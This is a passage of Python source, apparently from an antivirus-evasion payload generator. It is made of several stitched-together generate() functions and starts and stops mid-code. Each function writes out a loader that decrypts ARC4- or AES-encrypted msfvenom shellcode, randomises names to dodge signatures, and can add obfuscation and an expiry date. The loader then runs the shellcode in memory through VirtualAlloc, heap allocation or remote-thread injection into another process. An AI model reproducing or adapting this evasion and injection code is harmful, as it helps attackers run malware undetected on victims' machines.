'avlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n' PayloadCode += RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n' PayloadCode += 'avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))\n' if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta( days=int(self.required_options["EXPIRE_PAYLOAD"][0]))) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() ShellcodeVariableName = helpers.randomString() RandIV = helpers.randomString() RandARCKey = helpers.randomString() RandARCPayload = helpers.randomString() RandEncShellCodePayload = helpers.randomString() RandToday = helpers.randomString() RandExpire = helpers.randomString() HeapVar = helpers.randomString() # encrypt the shellcode and get our randomized key/iv (EncShellCode, (ARCKey, iv)) = encryption.encryptARC(Shellcode) PayloadCode = 'from Crypto.Cipher import ARC4\n' PayloadCode += 'import ctypes as avlol\n' PayloadCode += 'from datetime import datetime\n' PayloadCode += 'from datetime import date\n\n' PayloadCode += RandToday + ' = datetime.now()\n' PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[ 2:] + '\",\"%y-%m-%d\") \n' PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n' PayloadCode += '\t' + RandIV + ' = \'' + iv + '\'\n' PayloadCode += '\t' + RandARCKey + ' = \'' + ARCKey + '\'\n' PayloadCode += '\t' + RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n' PayloadCode += '\t' + RandEncShellCodePayload + ' = \'' + EncShellCode.encode( "string_escape") + '\'\n' PayloadCode += '\t' + ShellcodeVariableName + ' = bytearray(' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n' PayloadCode += '\t' + HeapVar + ' = avlol.windll.kernel32.HeapCreate(avlol.c_int(0x00040000),avlol.c_int(len(' + ShellcodeVariableName + ') * 2),avlol.c_int(0))\n' PayloadCode += '\t' + RandPtr + ' = avlol.windll.kernel32.HeapAlloc(avlol.c_int(' + HeapVar + '),avlol.c_int(0x00000008),avlol.c_int(len( ' + ShellcodeVariableName + ')))\n' PayloadCode += '\t' + RandBuf + ' = (avlol.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n' PayloadCode += '\tavlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n' PayloadCode += '\t' + RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n' PayloadCode += '\tavlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))\n' if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x": # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() ShellcodeVariableName = helpers.randomString() RandIV = helpers.randomString() RandARCKey = helpers.randomString() RandARCPayload = helpers.randomString() RandEncShellCodePayload = helpers.randomString() RandShellcode = helpers.randomString() RandReverseShell = helpers.randomString() RandMemoryShell = helpers.randomString() # encrypt the shellcode and get our randomized key/iv (EncShellCode, (ARCKey, iv)) = encryption.encryptARC(Shellcode) PayloadCode = 'from Crypto.Cipher import ARC4\n' PayloadCode += 'from ctypes import *\n' PayloadCode += RandIV + ' = \'' + iv + '\'\n' PayloadCode += RandARCKey + ' = \'' + ARCKey + '\'\n' PayloadCode += RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n' PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode( "string_escape") + '\'\n' PayloadCode += ShellcodeVariableName + ' = ' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\')\n' PayloadCode += RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n' PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n' PayloadCode += RandShellcode + '()' if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta( days=int(self.required_options["EXPIRE_PAYLOAD"][0]))) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() ShellcodeVariableName = helpers.randomString() RandIV = helpers.randomString() RandARCKey = helpers.randomString() RandARCPayload = helpers.randomString() RandEncShellCodePayload = helpers.randomString() RandShellcode = helpers.randomString() RandReverseShell = helpers.randomString() RandMemoryShell = helpers.randomString() RandToday = helpers.randomString() RandExpire = helpers.randomString() # encrypt the shellcode and get our randomized key/iv (EncShellCode, (ARCKey, iv)) = encryption.encryptARC(Shellcode) PayloadCode = 'from Crypto.Cipher import ARC4\n' PayloadCode += 'from ctypes import *\n' PayloadCode += 'from datetime import datetime\n' PayloadCode += 'from datetime import date\n\n' PayloadCode += RandToday + ' = datetime.now()\n' PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[ 2:] + '\",\"%y-%m-%d\") \n' PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n' PayloadCode += '\t' + RandIV + ' = \'' + iv + '\'\n' PayloadCode += '\t' + RandARCKey + ' = \'' + ARCKey + '\'\n' PayloadCode += '\t' + RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n' PayloadCode += '\t' + RandEncShellCodePayload + ' = \'' + EncShellCode.encode( "string_escape") + '\'\n' PayloadCode += '\t' + ShellcodeVariableName + ' = ' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\')\n' PayloadCode += '\t' + RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n' PayloadCode += '\t' + RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n' PayloadCode += '\t' + RandShellcode + '()' if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode
def generate(self): if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x": # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate(self.required_options) # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() pid_num_variable = helpers.randomString() pagerwx_variable = helpers.randomString() processall_variable = helpers.randomString() memcommit_variable = helpers.randomString() shell_length_variable = helpers.randomString() memalloc_variable = helpers.randomString() prochandle_variable = helpers.randomString() kernel32_variable = helpers.randomString() # Create Payload code PayloadCode = 'from ctypes import *\n\n' PayloadCode += pagerwx_variable + ' = 0x40\n' PayloadCode += processall_variable + ' = 0x1F0FFF\n' PayloadCode += memcommit_variable + ' = 0x00001000\n' PayloadCode += kernel32_variable + ' = windll.kernel32\n' PayloadCode += ShellcodeVariableName + ' = \"' + Shellcode + '\"\n' PayloadCode += pid_num_variable + ' = ' + self.required_options["PID_NUMBER"][0] +'\n' PayloadCode += shell_length_variable + ' = len(' + ShellcodeVariableName + ')\n\n' PayloadCode += prochandle_variable + ' = ' + kernel32_variable + '.OpenProcess(' + processall_variable + ', False, ' + pid_num_variable + ')\n' PayloadCode += memalloc_variable + ' = ' + kernel32_variable + '.VirtualAllocEx(' + prochandle_variable + ', 0, ' + shell_length_variable + ', ' + memcommit_variable + ', ' + pagerwx_variable + ')\n' PayloadCode += kernel32_variable + '.WriteProcessMemory(' + prochandle_variable + ', ' + memalloc_variable + ', ' + ShellcodeVariableName + ', ' + shell_length_variable + ', 0)\n' PayloadCode += kernel32_variable + '.CreateRemoteThread(' + prochandle_variable + ', None, 0, ' + memalloc_variable + ', 0, 0, 0)\n' if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0]))) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate(self.required_options) # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandToday = helpers.randomString() RandExpire = helpers.randomString() pid_num_variable = helpers.randomString() pagerwx_variable = helpers.randomString() processall_variable = helpers.randomString() memcommit_variable = helpers.randomString() shell_length_variable = helpers.randomString() memalloc_variable = helpers.randomString() prochandle_variable = helpers.randomString() kernel32_variable = helpers.randomString() # Create Payload code PayloadCode = 'from ctypes import *\n' PayloadCode += 'from datetime import datetime\n' PayloadCode += 'from datetime import date\n\n' PayloadCode += RandToday + ' = datetime.now()\n' PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n' PayloadCode += pagerwx_variable + ' = 0x40\n' PayloadCode += processall_variable + ' = 0x1F0FFF\n' PayloadCode += memcommit_variable + ' = 0x00001000\n' PayloadCode += kernel32_variable + ' = windll.kernel32\n' PayloadCode += ShellcodeVariableName + ' = \"' + Shellcode + '\"\n' PayloadCode += pid_num_variable + ' = ' + self.required_options["PID_NUMBER"][0] +'\n' PayloadCode += shell_length_variable + ' = len(' + ShellcodeVariableName + ')\n\n' PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n' PayloadCode += '\t' + prochandle_variable + ' = ' + kernel32_variable + '.OpenProcess(' + processall_variable + ', False, ' + pid_num_variable + ')\n' PayloadCode += '\t' + memalloc_variable + ' = ' + kernel32_variable + '.VirtualAllocEx(' + prochandle_variable + ', 0, ' + shell_length_variable + ', ' + memcommit_variable + ', ' + pagerwx_variable + ')\n' PayloadCode += '\t' + kernel32_variable + '.WriteProcessMemory(' + prochandle_variable + ', ' + memalloc_variable + ', ' + ShellcodeVariableName + ', ' + shell_length_variable + ', 0)\n' PayloadCode += '\t' + kernel32_variable + '.CreateRemoteThread(' + prochandle_variable + ', None, 0, ' + memalloc_variable + ', 0, 0, 0)\n' if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode
def generate(self): if self.required_options["inject_method"][0].lower() == "virtual": if self.required_options["expire_payload"][0].lower() == "x": # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandDecodeAES = helpers.randomString() RandCipherObject = helpers.randomString() RandDecodedShellcode = helpers.randomString() RandShellCode = helpers.randomString() RandPadding = helpers.randomString() # encrypt the shellcode and grab the randomized key (EncodedShellcode, secret) = encryption.encryptAES(Shellcode) # Create Payload code PayloadCode = 'import ctypes\n' PayloadCode += 'from Crypto.Cipher import AES\n' PayloadCode += 'import base64\n' PayloadCode += 'import os\n' PayloadCode += RandPadding + ' = \'{\'\n' PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n' PayloadCode += RandCipherObject + ' = AES.new(\'' + secret + '\')\n' PayloadCode += RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n' PayloadCode += RandShellCode + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n' PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + RandShellCode + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n' PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + RandShellCode + ')).from_buffer(' + RandShellCode + ')\n' PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + RandShellCode + ')))\n' PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n' PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n' if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0]))) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandDecodeAES = helpers.randomString() RandCipherObject = helpers.randomString() RandDecodedShellcode = helpers.randomString() RandShellCode = helpers.randomString() RandPadding = helpers.randomString() RandToday = helpers.randomString() RandExpire = helpers.randomString() # encrypt the shellcode and grab the randomized key (EncodedShellcode, secret) = encryption.encryptAES(Shellcode) # Create Payload code PayloadCode = 'import ctypes\n' PayloadCode += 'from Crypto.Cipher import AES\n' PayloadCode += 'import base64\n' PayloadCode += 'import os\n' PayloadCode += 'from datetime import datetime\n' PayloadCode += 'from datetime import date\n\n' PayloadCode += RandToday + ' = datetime.now()\n' PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n' PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n' PayloadCode += '\t' + RandPadding + ' = \'{\'\n' PayloadCode += '\t' + RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n' PayloadCode += '\t' + RandCipherObject + ' = AES.new(\'' + secret + '\')\n' PayloadCode += '\t' + RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n' PayloadCode += '\t' + RandShellCode + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n' PayloadCode += '\t' + RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + RandShellCode + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n' PayloadCode += '\t' + RandBuf + ' = (ctypes.c_char * len(' + RandShellCode + ')).from_buffer(' + RandShellCode + ')\n' PayloadCode += '\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + RandShellCode + ')))\n' PayloadCode += '\t' + RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n' PayloadCode += '\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n' if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode if self.required_options["inject_method"][0].lower() == "heap": if self.required_options["expire_payload"][0].lower() == "x": # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandDecodeAES = helpers.randomString() RandCipherObject = helpers.randomString() RandDecodedShellcode = helpers.randomString() RandShellCode = helpers.randomString() RandPadding = helpers.randomString() RandToday = helpers.randomString() RandExpire = helpers.randomString() HeapVar = helpers.randomString() # encrypt the shellcode and grab the randomized key (EncodedShellcode, secret) = encryption.encryptAES(Shellcode) # Create Payload code PayloadCode = 'import ctypes\n' PayloadCode += 'from Crypto.Cipher import AES\n' PayloadCode += 'import base64\n' PayloadCode += 'import os\n' PayloadCode += RandPadding + ' = \'{\'\n' PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n' PayloadCode += RandCipherObject + ' = AES.new(\'' + secret + '\')\n' PayloadCode += RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n' PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n' PayloadCode += HeapVar + ' = ctypes.windll.kernel32.HeapCreate(ctypes.c_int(0x00040000),ctypes.c_int(len(' + ShellcodeVariableName + ') * 2),ctypes.c_int(0))\n' PayloadCode += RandPtr + ' = ctypes.windll.kernel32.HeapAlloc(ctypes.c_int(' + HeapVar + '),ctypes.c_int(0x00000008),ctypes.c_int(len( ' + ShellcodeVariableName + ')))\n' PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n' PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n' PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n' PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n' if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0]))) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandDecodeAES = helpers.randomString() RandCipherObject = helpers.randomString() RandDecodedShellcode = helpers.randomString() RandShellCode = helpers.randomString() RandPadding = helpers.randomString() RandToday = helpers.randomString() RandExpire = helpers.randomString() HeapVar = helpers.randomString() # encrypt the shellcode and grab the randomized key (EncodedShellcode, secret) = encryption.encryptAES(Shellcode) # Create Payload code PayloadCode = 'import ctypes\n' PayloadCode += 'from Crypto.Cipher import AES\n' PayloadCode += 'import base64\n' PayloadCode += 'import os\n' PayloadCode += 'from datetime import datetime\n' PayloadCode += 'from datetime import date\n\n' PayloadCode += RandToday + ' = datetime.now()\n' PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n' PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n' PayloadCode += '\t' + RandPadding + ' = \'{\'\n' PayloadCode += '\t' + RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n' PayloadCode += '\t' + RandCipherObject + ' = AES.new(\'' + secret + '\')\n' PayloadCode += '\t' + RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n' PayloadCode += '\t' + ShellcodeVariableName + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n' PayloadCode += '\t' + HeapVar + ' = ctypes.windll.kernel32.HeapCreate(ctypes.c_int(0x00040000),ctypes.c_int(len(' + ShellcodeVariableName + ') * 2),ctypes.c_int(0))\n' PayloadCode += '\t' + RandPtr + ' = ctypes.windll.kernel32.HeapAlloc(ctypes.c_int(' + HeapVar + '),ctypes.c_int(0x00000008),ctypes.c_int(len( ' + ShellcodeVariableName + ')))\n' PayloadCode += '\t' + RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n' PayloadCode += '\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n' PayloadCode += '\t' + RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n' PayloadCode += '\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n' if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: if self.required_options["expire_payload"][0].lower() == "x": # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandDecodeAES = helpers.randomString() RandCipherObject = helpers.randomString() RandDecodedShellcode = helpers.randomString() RandShellCode = helpers.randomString() RandPadding = helpers.randomString() RandShellcode = helpers.randomString() RandReverseShell = helpers.randomString() RandMemoryShell = helpers.randomString() # encrypt the shellcode and grab the randomized key (EncodedShellcode, secret) = encryption.encryptAES(Shellcode) # Create Payload code PayloadCode = 'from ctypes import *\n' PayloadCode += 'from Crypto.Cipher import AES\n' PayloadCode += 'import base64\n' PayloadCode += 'import os\n' PayloadCode += RandPadding + ' = \'{\'\n' PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n' PayloadCode += RandCipherObject + ' = AES.new(\'' + secret + '\')\n' PayloadCode += RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n' PayloadCode += ShellcodeVariableName + ' = ' + RandDecodedShellcode + '.decode("string_escape")\n' PayloadCode += RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n' PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n' PayloadCode += RandShellcode + '()' if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0]))) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandDecodeAES = helpers.randomString() RandCipherObject = helpers.randomString() RandDecodedShellcode = helpers.randomString() RandShellCode = helpers.randomString() RandPadding = helpers.randomString() RandShellcode = helpers.randomString() RandReverseShell = helpers.randomString() RandMemoryShell = helpers.randomString() RandToday = helpers.randomString() RandExpire = helpers.randomString() # encrypt the shellcode and grab the randomized key (EncodedShellcode, secret) = encryption.encryptAES(Shellcode) # Create Payload code PayloadCode = 'from ctypes import *\n' PayloadCode += 'from Crypto.Cipher import AES\n' PayloadCode += 'import base64\n' PayloadCode += 'import os\n' PayloadCode += 'from datetime import datetime\n' PayloadCode += 'from datetime import date\n\n' PayloadCode += RandToday + ' = datetime.now()\n' PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n' PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n' PayloadCode += '\t' + RandPadding + ' = \'{\'\n' PayloadCode += '\t' + RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n' PayloadCode += '\t' + RandCipherObject + ' = AES.new(\'' + secret + '\')\n' PayloadCode += '\t' + RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n' PayloadCode += '\t' + ShellcodeVariableName + ' = ' + RandDecodedShellcode + '.decode("string_escape")\n' PayloadCode += '\t' + RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n' PayloadCode += '\t' + RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n' PayloadCode += '\t' + RandShellcode + '()' if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode
def generate(self): if self.required_options["inject_method"][0].lower() == "virtual": if self.required_options["expire_payload"][0].lower() == "x": # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandDecodeAES = helpers.randomString() RandCipherObject = helpers.randomString() RandDecodedShellcode = helpers.randomString() RandShellCode = helpers.randomString() RandPadding = helpers.randomString() # encrypt the shellcode and grab the randomized key (EncodedShellcode, secret) = encryption.encryptAES(Shellcode) # Create Payload code PayloadCode = "import ctypes\n" PayloadCode += "from Crypto.Cipher import AES\n" PayloadCode += "import base64\n" PayloadCode += "import os\n" PayloadCode += RandPadding + " = '{'\n" PayloadCode += ( RandDecodeAES + " = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(" + RandPadding + ")\n" ) PayloadCode += RandCipherObject + " = AES.new('" + secret + "')\n" PayloadCode += ( RandDecodedShellcode + " = " + RandDecodeAES + "(" + RandCipherObject + ", '" + EncodedShellcode + "')\n" ) PayloadCode += RandShellCode + " = bytearray(" + RandDecodedShellcode + '.decode("string_escape"))\n' PayloadCode += ( RandPtr + " = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(" + RandShellCode + ")),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n" ) PayloadCode += ( RandBuf + " = (ctypes.c_char * len(" + RandShellCode + ")).from_buffer(" + RandShellCode + ")\n" ) PayloadCode += ( "ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(" + RandPtr + ")," + RandBuf + ",ctypes.c_int(len(" + RandShellCode + ")))\n" ) PayloadCode += ( RandHt + " = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(" + RandPtr + "),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n" ) PayloadCode += ( "ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(" + RandHt + "),ctypes.c_int(-1))\n" ) if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0]))) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandDecodeAES = helpers.randomString() RandCipherObject = helpers.randomString() RandDecodedShellcode = helpers.randomString() RandShellCode = helpers.randomString() RandPadding = helpers.randomString() RandToday = helpers.randomString() RandExpire = helpers.randomString() # encrypt the shellcode and grab the randomized key (EncodedShellcode, secret) = encryption.encryptAES(Shellcode) # Create Payload code PayloadCode = "import ctypes\n" PayloadCode += "from Crypto.Cipher import AES\n" PayloadCode += "import base64\n" PayloadCode += "import os\n" PayloadCode += "from datetime import datetime\n" PayloadCode += "from datetime import date\n\n" PayloadCode += RandToday + " = datetime.now()\n" PayloadCode += RandExpire + ' = datetime.strptime("' + expiredate[2:] + '","%y-%m-%d") \n' PayloadCode += "if " + RandToday + " < " + RandExpire + ":\n" PayloadCode += "\t" + RandPadding + " = '{'\n" PayloadCode += ( "\t" + RandDecodeAES + " = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(" + RandPadding + ")\n" ) PayloadCode += "\t" + RandCipherObject + " = AES.new('" + secret + "')\n" PayloadCode += ( "\t" + RandDecodedShellcode + " = " + RandDecodeAES + "(" + RandCipherObject + ", '" + EncodedShellcode + "')\n" ) PayloadCode += ( "\t" + RandShellCode + " = bytearray(" + RandDecodedShellcode + '.decode("string_escape"))\n' ) PayloadCode += ( "\t" + RandPtr + " = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(" + RandShellCode + ")),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n" ) PayloadCode += ( "\t" + RandBuf + " = (ctypes.c_char * len(" + RandShellCode + ")).from_buffer(" + RandShellCode + ")\n" ) PayloadCode += ( "\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(" + RandPtr + ")," + RandBuf + ",ctypes.c_int(len(" + RandShellCode + ")))\n" ) PayloadCode += ( "\t" + RandHt + " = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(" + RandPtr + "),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n" ) PayloadCode += ( "\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(" + RandHt + "),ctypes.c_int(-1))\n" ) if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: if self.required_options["expire_payload"][0].lower() == "x": # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandDecodeAES = helpers.randomString() RandCipherObject = helpers.randomString() 